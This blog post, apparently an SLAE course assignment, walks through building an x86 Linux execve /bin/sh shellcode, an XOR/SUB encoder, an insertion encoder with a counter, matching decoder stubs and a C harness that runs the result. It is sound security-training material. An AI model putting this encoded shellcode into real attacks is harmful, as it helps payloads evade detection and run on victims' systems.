viernes, 17 de febrero de 2017

Assignment 4: Insertion Encoder (SLAE)


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-858

Exercise 

  •  Create a custom encoding scheme like the "Insertion Encoder" we showed you
  • PoC with using execve-stack as the shellcode to encode with your schema and execute   

 

Solution 


The custom scheme is compose by a execve-stack (/bin/sh) encoded with XOR and SUB, after I added the "Insertion Encoder" using insertion that consists in an incremental counter.

So, the insertion decoder stub must decode it using the counter. First, I take a execve shellcode using the stack and encode it.

execve-stack (/bin/sh) without encoding:

       
global _start   

section .text
_start:
 xor eax, eax
 push eax
 push 0x68732f2f
 push 0x6e69622f
 mov ebx, esp
 push eax
 mov edx, esp
 push ebx
 mov ecx, esp
 mov al, 11
 int 0x80

I encoded the execve-stack shellcode using XOR and SUB operators to encode the shellcode.

Encoder execve-stack shellcode 

       
#!/usr/bin/python

shellcode = ("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

for x in bytearray(shellcode) :
        y = x + 0x2
        c = y ^ 0xCA
        encoded += '\\x'
        encoded += '%02x' % c
        encoded2 += '0x'
        encoded2 += '%02x,' %c
        
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))

I created the nasm program to decode it and generate the new shellcode:

Decoder execve-stack encoded shellcode 

       
global _start   

section .text
_start:

 jmp short call_decoder

decoder:
 pop esi
 xor ecx, ecx
 mov cl,25
decode:
 xor byte[esi], 0xca
 sub byte[esi], 0x2
 inc esi
 loop decode
 jmp short Shellcode

call_decoder:
 call decoder
 Shellcode: db 0xf9,0x08,0x98,0xa0,0xba,0xfb,0xbf,0xa0,0xa0,0xfb,0xfb,0xae,0xa1,0x41,0x2f,0x98,0x41,0x2e,0x9f,0x41,0x29,0x78,0xc7,0x05,0x48

Getting the new shellcode:

       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ ./compile.sh xor-sub-execve-stack
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ objdump -d ./xor-sub-execve-stack|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x10\x5e\x31\xc9\xb1\x19\x80\x36\xca\x80\x2e\x02\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xf9\x08\x98\xa0\xba\xfb\xbf\xa0\xa0\xfb\xfb\xae\xa1\x41\x2f\x98\x41\x2e\x9f\x41\x29\x78\xc7\x05\x48"

Check if the shellcode works well... Finally, I added the custom encoded schema. 

Insertion encoder stub 

       
#!/usr/bin/python

encoded = ""
encoded2 = ""

shellcode = ("\xeb\x10\x5e\x31\xc9\xb1\x19\x80\x36\xca\x80\x2e\x02\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xf9\x08\x98\xa0\xba\xfb\xbf\xa0\xa0\xfb\xfb\xae\xa1\x41\x2f\x98\x41\x2e\x9f\x41\x29\x78\xc7\x05\x48")

print 'Encoded shellcode ...'

counter = 1
for x in bytearray(shellcode) :
        encoded += '\\x'
        encoded += '%02x' % x
        encoded += '\\x%02x' % counter

        encoded2 += '0x'
        encoded2 += '%02x,' %x
        encoded2 += '0x%02x,' % counter
        counter += 1


print encoded
print encoded2

print 'Len: %d' % len(bytearray(shellcode))


       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ ./Insertion-Encoder.py 
Encoded shellcode ...
\xeb\x01\x10\x02\x5e\x03\x31\x04\xc9\x05\xb1\x06\x19\x07\x80\x08\x36\x09\xca\x0a\x80\x0b\x2e\x0c\x02\x0d\x46\x0e\xe2\x0f\xf7\x10\xeb\x11\x05\x12\xe8\x13\xeb\x14\xff\x15\xff\x16\xff\x17\xf9\x18\x08\x19\x98\x1a\xa0\x1b\xba\x1c\xfb\x1d\xbf\x1e\xa0\x1f\xa0\x20\xfb\x21\xfb\x22\xae\x23\xa1\x24\x41\x25\x2f\x26\x98\x27\x41\x28\x2e\x29\x9f\x2a\x41\x2b\x29\x2c\x78\x2d\xc7\x2e\x05\x2f\x48\x30
0xeb,0x01,0x10,0x02,0x5e,0x03,0x31,0x04,0xc9,0x05,0xb1,0x06,0x19,0x07,0x80,0x08,0x36,0x09,0xca,0x0a,0x80,0x0b,0x2e,0x0c,0x02,0x0d,0x46,0x0e,0xe2,0x0f,0xf7,0x10,0xeb,0x11,0x05,0x12,0xe8,0x13,0xeb,0x14,0xff,0x15,0xff,0x16,0xff,0x17,0xf9,0x18,0x08,0x19,0x98,0x1a,0xa0,0x1b,0xba,0x1c,0xfb,0x1d,0xbf,0x1e,0xa0,0x1f,0xa0,0x20,0xfb,0x21,0xfb,0x22,0xae,0x23,0xa1,0x24,0x41,0x25,0x2f,0x26,0x98,0x27,0x41,0x28,0x2e,0x29,0x9f,0x2a,0x41,0x2b,0x29,0x2c,0x78,0x2d,0xc7,0x2e,0x05,0x2f,0x48,0x30,
Len: 48

Insertion decoder stub: 

       
global _start   

section .text
_start:

 jmp short call_shellcode

decoder:
 pop esi
 lea edi, [esi +1]
 xor eax, eax
 mov al, 1
 xor ebx, ebx
 xor ecx, ecx
 mov cl, 1   ;counter

decode: 
 mov bl, byte [esi + eax]
 xor bl, cl
 jnz short EncodedShellcode
 mov bl, byte [esi + eax + 1]
 mov byte [edi], bl
 inc edi
 add al, 2
 add cl, 1
 jmp short decode 



call_shellcode:

 call decoder
 EncodedShellcode: db 0xeb,0x01,0x10,0x02,0x5e,0x03,0x31,0x04,0xc9,0x05,0xb1,0x06,0x19,0x07,0x80,0x08,0x36,0x09,0xca,0x0a,0x80,0x0b,0x2e,0x0c,0x02,0x0d,0x46,0x0e,0xe2,0x0f,0xf7,0x10,0xeb,0x11,0x05,0x12,0xe8,0x13,0xeb,0x14,0xff,0x15,0xff,0x16,0xff,0x17,0xf9,0x18,0x08,0x19,0x98,0x1a,0xa0,0x1b,0xba,0x1c,0xfb,0x1d,0xbf,0x1e,0xa0,0x1f,0xa0,0x20,0xfb,0x21,0xfb,0x22,0xae,0x23,0xa1,0x24,0x41,0x25,0x2f,0x26,0x98,0x27,0x41,0x28,0x2e,0x29,0x9f,0x2a,0x41,0x2b,0x29,0x2c,0x78,0x2d,0xc7,0x2e,0x05,0x2f,0x48,0x30


       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ objdump -d ./insertion-decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x23\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x31\xc9\xb1\x01\x8a\x1c\x06\x30\xcb\x75\x13\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\x80\xc1\x01\xeb\xeb\xe8\xd8\xff\xff\xff\xeb\x01\x10\x02\x5e\x03\x31\x04\xc9\x05\xb1\x06\x19\x07\x80\x08\x36\x09\xca\x0a\x80\x0b\x2e\x0c\x02\x0d\x46\x0e\xe2\x0f\xf7\x10\xeb\x11\x05\x12\xe8\x13\xeb\x14\xff\x15\xff\x16\xff\x17\xf9\x18\x08\x19\x98\x1a\xa0\x1b\xba\x1c\xfb\x1d\xbf\x1e\xa0\x1f\xa0\x20\xfb\x21\xfb\x22\xae\x23\xa1\x24\x41\x25\x2f\x26\x98\x27\x41\x28\x2e\x29\x9f\x2a\x41\x2b\x29\x2c\x78\x2d\xc7\x2e\x05\x2f\x48\x30"

And we check that the shellcode works well...

Proof of Concept (PoC) 

       
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ cat shellcode.c 
#include
#include

unsigned char code[] = 
"\xeb\x23\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x31\xc9\xb1\x01\x8a\x1c\x06\x30\xcb\x75\x13\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\x80\xc1\x01\xeb\xeb\xe8\xd8\xff\xff\xff\xeb\x01\x10\x02\x5e\x03\x31\x04\xc9\x05\xb1\x06\x19\x07\x80\x08\x36\x09\xca\x0a\x80\x0b\x2e\x0c\x02\x0d\x46\x0e\xe2\x0f\xf7\x10\xeb\x11\x05\x12\xe8\x13\xeb\x14\xff\x15\xff\x16\xff\x17\xf9\x18\x08\x19\x98\x1a\xa0\x1b\xba\x1c\xfb\x1d\xbf\x1e\xa0\x1f\xa0\x20\xfb\x21\xfb\x22\xae\x23\xa1\x24\x41\x25\x2f\x26\x98\x27\x41\x28\x2e\x29\x9f\x2a\x41\x2b\x29\x2c\x78\x2d\xc7\x2e\x05\x2f\x48\x30";

main()
{

 printf("Shellcode Length:  %d\n", strlen(code));

 int (*ret)() = (int(*)())code;

 ret();

}
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
hiro@HackingLab:~/SLAE/SLAE/EXAMEN/GitHub/SLAE/Assignment4$ ./shellcode 
Shellcode Length:  138
$ id
uid=1000(hiro) gid=1000(hiro) groups=1000(hiro),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner)
$


Source code:
https://github.com/Sinkmanu/SLAE/tree/master/Assignment4
Publicado por en
Etiquetas: , , , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)